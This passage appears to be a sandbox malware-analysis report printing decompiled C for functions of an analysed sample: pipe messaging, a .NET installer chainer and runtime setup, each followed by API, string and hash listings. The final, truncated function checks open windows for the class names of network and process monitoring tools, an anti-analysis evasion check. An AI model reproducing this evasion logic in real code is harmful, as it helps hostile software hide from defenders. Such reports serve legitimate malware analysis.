                                                                                                                                                                  												E004300D9(0x80004005, "pipe.cpp", 0x20c, _t88);
                                                                                                                                                                  												_push("Failed to write secret to pipe.");
                                                                                                                                                                  												goto L28;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												if(WriteFile(_t83,  &_v28, 4,  &_a4, 0) == 0) {
                                                                                                                                                                  													_t73 = GetLastError();
                                                                                                                                                                  													_t103 =  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  													_t88 =  >=  ? 0x80004005 :  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  													E004300D9(0x80004005, "pipe.cpp", 0x211, _t88);
                                                                                                                                                                  													_push("Failed to write our process id to pipe.");
                                                                                                                                                                  													goto L28;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													if(ReadFile(_t83,  &_v32, 4,  &_a4, 0) == 0) {
                                                                                                                                                                  														_t79 = GetLastError();
                                                                                                                                                                  														_t106 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														_t88 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  														E004300D9(0x80004005, "pipe.cpp", 0x217, _t88);
                                                                                                                                                                  														_push("Failed to read ACK from pipe.");
                                                                                                                                                                  														goto L28;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t44 = _v20 + 1;
                                                                                                                                                                  														_v20 = _t44;
                                                                                                                                                                  														if(_t44 < 2) {
                                                                                                                                                                  															goto L1;
                                                                                                                                                                  														} else {
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									if(_t52 != 0x218) {
                                                                                                                                                                  										_t88 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										break;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t52 = _v12;
                                                                                                                                                                  										if(_t52 >= 0x708) {
                                                                                                                                                                  											_t88 = 0x800705b4;
                                                                                                                                                                  											L21:
                                                                                                                                                                  											E004300D9(_t52, "pipe.cpp", 0x1fb, _t88);
                                                                                                                                                                  											_push("Failed to wait for child to connect to pipe.");
                                                                                                                                                                  											L28:
                                                                                                                                                                  											_push(_t88);
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t52 = _t52 + 1;
                                                                                                                                                                  											_t88 = 0x80070218;
                                                                                                                                                                  											_v12 = _t52;
                                                                                                                                                                  											Sleep(0x64);
                                                                                                                                                                  											goto L9;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L29;
                                                                                                                                                                  							L9:
                                                                                                                                                                  						} while (_t88 == 0x80070218);
                                                                                                                                                                  						if(_t88 < 0) {
                                                                                                                                                                  							goto L21;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							goto L11;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					break;
                                                                                                                                                                  				}
                                                                                                                                                                  				L29:
                                                                                                                                                                  				return _t88;
                                                                                                                                                                  			}


























                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,0000046C,00000000,?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040F9FD
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040FA08
                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040FA3F
                                                                                                                                                                  • ConnectNamedPipe.KERNEL32(?,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FA54
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FA5E
                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FA8F
                                                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FAB2
                                                                                                                                                                  • WriteFile.KERNEL32(?,00401414,00000004,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FACD
                                                                                                                                                                  • WriteFile.KERNEL32(?,8BE275C0,00401414,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FAE8
                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FB03
                                                                                                                                                                  • ReadFile.KERNEL32(?,00401105,00000004,00000000,00000000,?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FB1E
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FB76
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FBAA
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414), ref: 0040FBDE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00401105,00000000,8BE275C0,?,00401414,00000000), ref: 0040FC74
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                                                  • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$pipe.cpp
                                                                                                                                                                  • API String ID: 2944378912-2009266399
                                                                                                                                                                  • Opcode ID: 986e2ce386f91985788ffe928dfd5e8203d4ff1712cea65f578d2d37fd26a131
                                                                                                                                                                  • Instruction ID: 4d7a7f9e5786017a8f1906c7c50a162a1675cb7dcb15adddf823dbf4dc0414ff
                                                                                                                                                                  • Opcode Fuzzy Hash: 986e2ce386f91985788ffe928dfd5e8203d4ff1712cea65f578d2d37fd26a131
                                                                                                                                                                  • Instruction Fuzzy Hash: CE619376E40325AAFB209AB58D46BAB76E8FB04741F214136BE05F71C0D67C9D018AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E10011936(void* __ebx) {
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                                                  				long _t10;
                                                                                                                                                                  				void* _t11;
                                                                                                                                                                  				int _t12;
                                                                                                                                                                  				void* _t18;
                                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                                  				long _t26;
                                                                                                                                                                  				void* _t30;
                                                                                                                                                                  				struct HINSTANCE__* _t37;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  
                                                                                                                                                                  				_t30 = __ebx;
                                                                                                                                                                  				_t37 = GetModuleHandleA("KERNEL32.DLL");
                                                                                                                                                                  				if(_t37 != 0) {
                                                                                                                                                                  					 *0x10335478 = GetProcAddress(_t37, "FlsAlloc");
                                                                                                                                                                  					 *0x1033547c = GetProcAddress(_t37, "FlsGetValue");
                                                                                                                                                                  					 *0x10335480 = GetProcAddress(_t37, "FlsSetValue");
                                                                                                                                                                  					_t7 = GetProcAddress(_t37, "FlsFree");
                                                                                                                                                                  					__eflags =  *0x10335478;
                                                                                                                                                                  					_t40 = TlsSetValue;
                                                                                                                                                                  					 *0x10335484 = _t7;
                                                                                                                                                                  					if( *0x10335478 == 0) {
                                                                                                                                                                  						L6:
                                                                                                                                                                  						 *0x1033547c = TlsGetValue;
                                                                                                                                                                  						 *0x10335478 = E100115ED;
                                                                                                                                                                  						 *0x10335480 = _t40;
                                                                                                                                                                  						 *0x10335484 = TlsFree;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						__eflags =  *0x1033547c;
                                                                                                                                                                  						if( *0x1033547c == 0) {
                                                                                                                                                                  							goto L6;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							__eflags =  *0x10335480;
                                                                                                                                                                  							if( *0x10335480 == 0) {
                                                                                                                                                                  								goto L6;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								__eflags = _t7;
                                                                                                                                                                  								if(_t7 == 0) {
                                                                                                                                                                  									goto L6;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t10 = TlsAlloc();
                                                                                                                                                                  					__eflags = _t10 - 0xffffffff;
                                                                                                                                                                  					 *0x10334594 = _t10;
                                                                                                                                                                  					if(_t10 == 0xffffffff) {
                                                                                                                                                                  						L15:
                                                                                                                                                                  						_t11 = 0;
                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t12 = TlsSetValue(_t10,  *0x1033547c);
                                                                                                                                                                  						__eflags = _t12;
                                                                                                                                                                  						if(_t12 == 0) {
                                                                                                                                                                  							goto L15;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E10011D56();
                                                                                                                                                                  							 *0x10335478 = E1001151E( *0x10335478);
                                                                                                                                                                  							 *0x1033547c = E1001151E( *0x1033547c);
                                                                                                                                                                  							 *0x10335480 = E1001151E( *0x10335480);
                                                                                                                                                                  							 *0x10335484 = E1001151E( *0x10335484);
                                                                                                                                                                  							_t18 = E1000F8ED();
                                                                                                                                                                  							__eflags = _t18;
                                                                                                                                                                  							if(_t18 == 0) {
                                                                                                                                                                  								L14:
                                                                                                                                                                  								E10011620();
                                                                                                                                                                  								goto L15;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(L100117AC);
                                                                                                                                                                  								_t21 =  *((intOrPtr*)(E1001158A( *0x10335478)))();
                                                                                                                                                                  								__eflags = _t21 - 0xffffffff;
                                                                                                                                                                  								 *0x10334590 = _t21;
                                                                                                                                                                  								if(_t21 == 0xffffffff) {
                                                                                                                                                                  									goto L14;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t42 = E10014911(1, 0x214);
                                                                                                                                                                  									__eflags = _t42;
                                                                                                                                                                  									if(_t42 == 0) {
                                                                                                                                                                  										goto L14;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push(_t42);
                                                                                                                                                                  										_push( *0x10334590);
                                                                                                                                                                  										__eflags =  *((intOrPtr*)(E1001158A( *0x10335480)))();
                                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                                  											goto L14;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push(0);
                                                                                                                                                                  											_push(_t42);
                                                                                                                                                                  											E1001165D(_t30, _t37, _t42, __eflags);
                                                                                                                                                                  											_t26 = GetCurrentThreadId();
                                                                                                                                                                  											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                                                                                                                                                  											 *_t42 = _t26;
                                                                                                                                                                  											_t11 = 1;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t11;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E10011620();
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  			}

















                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,1000EA1D), ref: 1001193C
                                                                                                                                                                  • __mtterm.LIBCMT ref: 10011948
                                                                                                                                                                    • Part of subcall function 10011620: __decode_pointer.LIBCMT ref: 10011631
                                                                                                                                                                    • Part of subcall function 10011620: TlsFree.KERNEL32(00000020,10011AB5), ref: 1001164B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001195E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001196B
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10011978
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10011985
                                                                                                                                                                  • TlsAlloc.KERNEL32 ref: 100119D5
                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000), ref: 100119F0
                                                                                                                                                                  • __init_pointers.LIBCMT ref: 100119FA
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A05
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A15
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A25
                                                                                                                                                                  • __encode_pointer.LIBCMT ref: 10011A35
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A56
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 10011A6F
                                                                                                                                                                  • __decode_pointer.LIBCMT ref: 10011A89
                                                                                                                                                                  • __initptd.LIBCMT ref: 10011A98
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 10011A9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                  • API String ID: 2657569430-3819984048
                                                                                                                                                                  • Opcode ID: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction ID: 808ad0af3f4b6be62188e372f3d3457f3cdf16e918fc8b475f3418519981f6d4
                                                                                                                                                                  • Opcode Fuzzy Hash: 93fa50452aaafecd530976381e4c398f97edee3f3156b12a78c3b9aad9b59f54
                                                                                                                                                                  • Instruction Fuzzy Hash: 16318F358042219AE709EF76ACC56893AB9EB84296F52062AF569DF1E3DF31D4C09B10
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                                                  			E0042465F(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, void*** _a12) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t56;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				signed short _t80;
                                                                                                                                                                  				signed short _t84;
                                                                                                                                                                  				signed short _t87;
                                                                                                                                                                  				signed short _t90;
                                                                                                                                                                  				signed short _t93;
                                                                                                                                                                  				WCHAR* _t99;
                                                                                                                                                                  				void** _t108;
                                                                                                                                                                  				void* _t113;
                                                                                                                                                                  				void* _t131;
                                                                                                                                                                  				void* _t132;
                                                                                                                                                                  
                                                                                                                                                                  				_t98 = __ebx;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t108 = E00431078(0x18, 1);
                                                                                                                                                                  				if(_t108 != 0) {
                                                                                                                                                                  					_push(__ebx);
                                                                                                                                                                  					_t99 = _a8;
                                                                                                                                                                  					_t48 = CreateEventW(0, 0, 0, _t99);
                                                                                                                                                                  					_t108[1] = _t48;
                                                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                                                  						_t50 = E00433CEA( &_v8, L"%ls_send", _t99);
                                                                                                                                                                  						_t132 = _t131 + 0xc;
                                                                                                                                                                  						if(_t50 >= 0) {
                                                                                                                                                                  							_t52 = CreateEventW(0, 0, 0, _v8);
                                                                                                                                                                  							_t108[2] = _t52;
                                                                                                                                                                  							if(_t52 != 0) {
                                                                                                                                                                  								_t113 = E00433CEA( &_v8, L"%ls_mutex", _t99);
                                                                                                                                                                  								_t132 = _t132 + 0xc;
                                                                                                                                                                  								if(_t113 >= 0) {
                                                                                                                                                                  									_t55 = CreateMutexW(0, 1, _v8);
                                                                                                                                                                  									_t108[3] = _t55;
                                                                                                                                                                  									if(_t55 != 0) {
                                                                                                                                                                  										_t56 = CreateFileMappingW(0xffffffff, 0, 4, 0, 0x10000, _a4);
                                                                                                                                                                  										 *_t108 = _t56;
                                                                                                                                                                  										if(_t56 != 0) {
                                                                                                                                                                  											_t57 = MapViewOfFile(_t56, 2, 0, 0, 0);
                                                                                                                                                                  											_t108[4] = _t57;
                                                                                                                                                                  											if(_t57 != 0) {
                                                                                                                                                                  												_t113 = E0041CDDB(_t57 + 0x21a, 0x104, _t99);
                                                                                                                                                                  												if(_t113 >= 0) {
                                                                                                                                                                  													 *(_t108[4]) = 0;
                                                                                                                                                                  													 *((char*)(_t108[4] + 0x218)) = 0;
                                                                                                                                                                  													 *((intOrPtr*)(_t108[4] + 4)) = 0x8000000a;
                                                                                                                                                                  													 *((char*)(_t108[4] + 2)) = 0;
                                                                                                                                                                  													 *((char*)(_t108[4] + 1)) = 0;
                                                                                                                                                                  													 *((char*)(_t108[4] + 0x219)) = 0;
                                                                                                                                                                  													 *((intOrPtr*)(_t108[4] + 8)) = 0x8000000a;
                                                                                                                                                                  													 *((char*)(_t108[4] + 3)) = 0;
                                                                                                                                                                  													 *((intOrPtr*)(_t108[4] + 0xc)) = 0;
                                                                                                                                                                  													 *((char*)(_t108[4] + 0x422)) = 1;
                                                                                                                                                                  													 *((intOrPtr*)(_t108[4] + 0x424)) = 0;
                                                                                                                                                                  													 *((intOrPtr*)(_t108[4] + 0x428)) = 0;
                                                                                                                                                                  													 *((intOrPtr*)(_t108[4] + 0x42c)) = 0;
                                                                                                                                                                  													ReleaseMutex(_t108[3]);
                                                                                                                                                                  													 *_a12 = _t108;
                                                                                                                                                                  													_t108 = 0;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_push("failed to copy event name to shared memory structure.");
                                                                                                                                                                  													goto L20;
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t80 = GetLastError();
                                                                                                                                                                  												_t118 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												_t113 =  >=  ? 0x80004005 :  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												E004300D9(0x80004005, "NetFxChainer.cpp", 0x50, _t113);
                                                                                                                                                                  												_push(_a4);
                                                                                                                                                                  												_push("Failed to MapViewOfFile for %ls.");
                                                                                                                                                                  												goto L17;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t84 = GetLastError();
                                                                                                                                                                  											_t121 =  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											_t113 =  >=  ? 0x80004005 :  <=  ? _t84 : _t84 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  											E004300D9(0x80004005, "NetFxChainer.cpp", 0x49, _t113);
                                                                                                                                                                  											_push(_a4);
                                                                                                                                                                  											_push("Failed to memory map cabinet file: %ls");
                                                                                                                                                                  											goto L17;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t87 = GetLastError();
                                                                                                                                                                  										_t124 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t113 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										E004300D9(0x80004005, "NetFxChainer.cpp", 0x41, _t113);
                                                                                                                                                                  										_push(_v8);
                                                                                                                                                                  										_push("Failed to create mutex: %ls");
                                                                                                                                                                  										goto L17;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push("failed to allocate memory for mutex name");
                                                                                                                                                                  									goto L20;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t90 = GetLastError();
                                                                                                                                                                  								_t127 =  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t113 =  >=  ? 0x80004005 :  <=  ? _t90 : _t90 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								E004300D9(0x80004005, "NetFxChainer.cpp", 0x3a, _t113);
                                                                                                                                                                  								_push(_v8);
                                                                                                                                                                  								goto L8;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push("failed to allocate memory for event name");
                                                                                                                                                                  							L20:
                                                                                                                                                                  							_push(_t113);
                                                                                                                                                                  							E00430A57();
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t93 = GetLastError();
                                                                                                                                                                  						_t130 =  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t113 =  >=  ? 0x80004005 :  <=  ? _t93 : _t93 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "NetFxChainer.cpp", 0x34, _t113);
                                                                                                                                                                  						_push(_t99);
                                                                                                                                                                  						L8:
                                                                                                                                                                  						_push("Failed to create event: %ls");
                                                                                                                                                                  						L17:
                                                                                                                                                                  						_push(_t113);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  					_pop(_t98);
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t113 = 0x8007000e;
                                                                                                                                                                  					E004300D9(_t47, "NetFxChainer.cpp", 0x31, 0x8007000e);
                                                                                                                                                                  					_push("Failed to allocate memory for NetFxChainer struct.");
                                                                                                                                                                  					_push(0x8007000e);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                  					E004380AB(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_t108 != 0) {
                                                                                                                                                                  					if(_t108[3] != 0) {
                                                                                                                                                                  						ReleaseMutex(_t108[3]);
                                                                                                                                                                  					}
                                                                                                                                                                  					E0042492E(_t98, _t108, _t108);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t113;
                                                                                                                                                                  			}






















                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,00424D81,?,?,?), ref: 004246A5
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00424D81,?,?,?), ref: 004246B2
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 0042491A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocCreateErrorEventLastMutexProcessRelease
                                                                                                                                                                  • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$NetFxChainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                                                  • API String ID: 1118593306-2991465304
                                                                                                                                                                  • Opcode ID: 52dfdd44334eb726864d88ef9ab925c313f4e4dceadc902ceb67258f2fdeeaab
                                                                                                                                                                  • Instruction ID: 5692cc44a49f86214c9be3405e521a419977a862ad3b0571153b2ab1a861b75e
                                                                                                                                                                  • Opcode Fuzzy Hash: 52dfdd44334eb726864d88ef9ab925c313f4e4dceadc902ceb67258f2fdeeaab
                                                                                                                                                                  • Instruction Fuzzy Hash: 2171B076B41721BBE7119B65AC49F9BBAE4FF08350F114266FD04A7290D768D800CAEC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E10019430(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                  				char _v267;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				char _v531;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				void* _t35;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				void* _t38;
                                                                                                                                                                  				void* _t39;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  				void* _t42;
                                                                                                                                                                  				void* _t43;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  				void* _t53;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				void* _t61;
                                                                                                                                                                  				void* _t66;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				void* _t92;
                                                                                                                                                                  				void* _t93;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  				void* _t95;
                                                                                                                                                                  				void* _t96;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				void* _t98;
                                                                                                                                                                  				void* _t99;
                                                                                                                                                                  				void* _t100;
                                                                                                                                                                  
                                                                                                                                                                  				_t87 = __edi;
                                                                                                                                                                  				_t70 = __ebx;
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v531, 0, 0x103);
                                                                                                                                                                  				_v268 = 0;
                                                                                                                                                                  				E1000CF80(_t87,  &_v267, 0, 0x103);
                                                                                                                                                                  				GetClassNameA(_a4,  &_v532, 0x104);
                                                                                                                                                                  				GetWindowTextA(_a4,  &_v268, 0x104);
                                                                                                                                                                  				_t35 = E1000CAD0( &_v532);
                                                                                                                                                                  				_t91 = _t88 + 0x1c;
                                                                                                                                                                  				_t108 = _t35;
                                                                                                                                                                  				if(_t35 <= 0) {
                                                                                                                                                                  					L30:
                                                                                                                                                                  					return 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t37 = E10019390(__ebx, _t87, _t108,  &_v532, "Afx:400000:8:10003:0:");
                                                                                                                                                                  				_t92 = _t91 + 8;
                                                                                                                                                                  				if(_t37 == 0) {
                                                                                                                                                                  					_t38 = E10019390(__ebx, _t87, __eflags,  &_v532, "TCPViewClass");
                                                                                                                                                                  					_t93 = _t92 + 8;
                                                                                                                                                                  					__eflags = _t38;
                                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                                  						_t39 = E10019390(__ebx, _t87, __eflags,  &_v532, "TStdHttpAnalyzerForm");
                                                                                                                                                                  						_t94 = _t93 + 8;
                                                                                                                                                                  						__eflags = _t39;
                                                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                                                  							_t41 = E10019390(_t70, _t87, __eflags,  &_v532, "gdkWindowToplevel");
                                                                                                                                                                  							_t95 = _t94 + 8;
                                                                                                                                                                  							__eflags = _t41;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								_t42 = E10019390(_t70, _t87, __eflags,  &_v532, "XTPMainFrame");
                                                                                                                                                                  								_t96 = _t95 + 8;
                                                                                                                                                                  								__eflags = _t42;
                                                                                                                                                                  								if(_t42 == 0) {
                                                                                                                                                                  									_t43 = E1000CAD0( &_v268);
                                                                                                                                                                  									_t97 = _t96 + 4;
